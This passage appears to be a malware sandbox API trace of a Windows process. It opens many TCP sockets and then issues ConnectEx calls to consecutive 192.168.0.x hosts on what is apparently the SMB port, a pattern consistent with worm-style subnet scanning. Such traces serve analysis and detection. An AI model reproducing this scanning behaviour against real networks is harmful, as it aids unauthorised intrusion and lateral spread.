protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5d4 [0137.146] bind (s=0x5d4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.146] CreateIoCompletionPort (FileHandle=0x5d4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.146] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5d8 [0137.147] bind (s=0x5d8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.147] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.147] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5dc [0137.147] bind (s=0x5dc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.147] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.147] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5e0 [0137.147] bind (s=0x5e0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.148] CreateIoCompletionPort (FileHandle=0x5e0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.148] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5e4 [0137.148] bind (s=0x5e4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.148] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.148] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5e8 [0137.148] bind (s=0x5e8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.149] CreateIoCompletionPort (FileHandle=0x5e8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.149] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5ec [0137.149] bind (s=0x5ec, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.149] CreateIoCompletionPort (FileHandle=0x5ec, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.149] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5f0 [0137.149] bind (s=0x5f0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.150] CreateIoCompletionPort (FileHandle=0x5f0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.150] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5f4 [0137.150] bind (s=0x5f4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.150] CreateIoCompletionPort (FileHandle=0x5f4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.150] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5f8 [0137.150] bind (s=0x5f8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.151] CreateIoCompletionPort (FileHandle=0x5f8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.151] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5fc [0137.151] bind (s=0x5fc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.151] CreateIoCompletionPort (FileHandle=0x5fc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.151] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x600 [0137.151] bind (s=0x600, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.152] CreateIoCompletionPort (FileHandle=0x600, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.152] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x604 [0137.152] bind (s=0x604, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.152] CreateIoCompletionPort (FileHandle=0x604, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.152] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x608 [0137.153] bind (s=0x608, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.153] CreateIoCompletionPort (FileHandle=0x608, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.153] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x60c [0137.153] bind (s=0x60c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.153] CreateIoCompletionPort (FileHandle=0x60c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.153] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x610 [0137.154] bind (s=0x610, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.154] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.154] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x614 [0137.154] bind (s=0x614, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.154] CreateIoCompletionPort (FileHandle=0x614, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.154] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x618 [0137.154] bind (s=0x618, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.155] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.155] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x61c [0137.155] bind (s=0x61c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.156] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.156] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x620 [0137.156] bind (s=0x620, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.156] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.156] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x624 [0137.156] bind (s=0x624, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.157] CreateIoCompletionPort (FileHandle=0x624, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.157] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x628 [0137.157] bind (s=0x628, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.157] CreateIoCompletionPort (FileHandle=0x628, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.157] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x62c [0137.157] bind (s=0x62c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.158] CreateIoCompletionPort (FileHandle=0x62c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.158] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x630 [0137.158] bind (s=0x630, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.158] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.158] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x634 [0137.158] bind (s=0x634, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.159] CreateIoCompletionPort (FileHandle=0x634, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.159] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x638 [0137.159] bind (s=0x638, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.159] CreateIoCompletionPort (FileHandle=0x638, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.159] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x63c [0137.159] bind (s=0x63c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.160] CreateIoCompletionPort (FileHandle=0x63c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.160] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x640 [0137.161] bind (s=0x640, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.161] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.161] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x644 [0137.161] bind (s=0x644, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.161] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.161] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x648 [0137.162] bind (s=0x648, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.162] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.162] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x64c [0137.162] bind (s=0x64c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.162] CreateIoCompletionPort (FileHandle=0x64c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.162] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x650 [0137.162] bind (s=0x650, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.163] CreateIoCompletionPort (FileHandle=0x650, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.163] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x654 [0137.163] bind (s=0x654, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.163] CreateIoCompletionPort (FileHandle=0x654, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.163] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x658 [0137.163] bind (s=0x658, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.164] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.164] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x65c [0137.164] bind (s=0x65c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.164] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.164] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x660 [0137.164] bind (s=0x660, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.165] CreateIoCompletionPort (FileHandle=0x660, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.165] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x664 [0137.165] bind (s=0x664, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.165] CreateIoCompletionPort (FileHandle=0x664, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.165] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x668 [0137.165] bind (s=0x668, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.166] CreateIoCompletionPort (FileHandle=0x668, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.166] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x66c [0137.166] bind (s=0x66c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.166] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.166] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x670 [0137.166] bind (s=0x670, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.167] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.167] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x674 [0137.167] bind (s=0x674, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.167] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.167] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x678 [0137.167] bind (s=0x678, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.168] CreateIoCompletionPort (FileHandle=0x678, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.168] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x67c [0137.168] bind (s=0x67c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.168] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.168] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x680 [0137.168] bind (s=0x680, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.169] CreateIoCompletionPort (FileHandle=0x680, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.169] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x684 [0137.169] bind (s=0x684, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.169] CreateIoCompletionPort (FileHandle=0x684, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.169] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x688 [0137.169] bind (s=0x688, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.169] CreateIoCompletionPort (FileHandle=0x688, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.170] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x68c [0137.170] bind (s=0x68c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.170] CreateIoCompletionPort (FileHandle=0x68c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.170] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x690 [0137.170] bind (s=0x690, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.170] CreateIoCompletionPort (FileHandle=0x690, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.171] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x694 [0137.171] bind (s=0x694, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.171] CreateIoCompletionPort (FileHandle=0x694, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.171] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x698 [0137.171] bind (s=0x698, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.172] CreateIoCompletionPort (FileHandle=0x698, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.172] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x69c [0137.172] bind (s=0x69c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.172] CreateIoCompletionPort (FileHandle=0x69c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.172] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x6a0 [0137.172] bind (s=0x6a0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.172] CreateIoCompletionPort (FileHandle=0x6a0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.172] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x6a4 [0137.173] bind (s=0x6a4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.173] CreateIoCompletionPort (FileHandle=0x6a4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.173] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x6a8 [0137.173] bind (s=0x6a8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.173] CreateIoCompletionPort (FileHandle=0x6a8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.176] ConnectEx (in: s=0x2c4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.0"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed4f10 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.178] WSAGetLastError () returned 997 [0137.178] htons (hostshort=0x1bd) returned 0xbd01 [0137.178] ConnectEx (in: s=0x2c8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.1"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed4fa0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.178] WSAGetLastError () returned 997 [0137.178] htons (hostshort=0x1bd) returned 0xbd01 [0137.178] ConnectEx (in: s=0x2cc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.2"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed50c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.182] WSAGetLastError () returned 997 [0137.182] htons (hostshort=0x1bd) returned 0xbd01 [0137.182] ConnectEx (in: s=0x2d0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.3"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5090 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.183] WSAGetLastError () returned 997 [0137.183] htons (hostshort=0x1bd) returned 0xbd01 [0137.183] ConnectEx (in: s=0x2d4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.4"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed4f70 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.183] WSAGetLastError () returned 997 [0137.183] htons (hostshort=0x1bd) returned 0xbd01 [0137.183] ConnectEx (in: s=0x2d8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.5"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed4f40 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.183] WSAGetLastError () returned 997 [0137.183] htons (hostshort=0x1bd) returned 0xbd01 [0137.183] ConnectEx (in: s=0x2dc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.6"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5000 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.184] WSAGetLastError () returned 997 [0137.184] htons (hostshort=0x1bd) returned 0xbd01 [0137.184] ConnectEx (in: s=0x2e0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.7"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5060 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.184] WSAGetLastError () returned 997 [0137.184] htons (hostshort=0x1bd) returned 0xbd01 [0137.184] ConnectEx (in: s=0x2e4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.8"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed50f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.184] WSAGetLastError () returned 997 [0137.184] htons (hostshort=0x1bd) returned 0xbd01 [0137.184] ConnectEx (in: s=0x2e8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.9"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5120 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.185] WSAGetLastError () returned 997 [0137.185] htons (hostshort=0x1bd) returned 0xbd01 [0137.185] ConnectEx (in: s=0x2ec, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.10"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5150 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.185] WSAGetLastError () returned 997 [0137.185] htons (hostshort=0x1bd) returned 0xbd01 [0137.185] ConnectEx (in: s=0x2f0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.11"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5180 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.185] WSAGetLastError () returned 997 [0137.185] htons (hostshort=0x1bd) returned 0xbd01 [0137.185] ConnectEx (in: s=0x2f4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.12"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed51b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.186] WSAGetLastError () returned 997 [0137.186] htons (hostshort=0x1bd) returned 0xbd01 [0137.186] ConnectEx (in: s=0x2f8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.13"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed51e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.186] WSAGetLastError () returned 997 [0137.186] htons (hostshort=0x1bd) returned 0xbd01 [0137.186] ConnectEx (in: s=0x2fc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.14"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5210 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.186] WSAGetLastError () returned 997 [0137.186] htons (hostshort=0x1bd) returned 0xbd01 [0137.186] ConnectEx (in: s=0x300, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.15"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5240 | out: 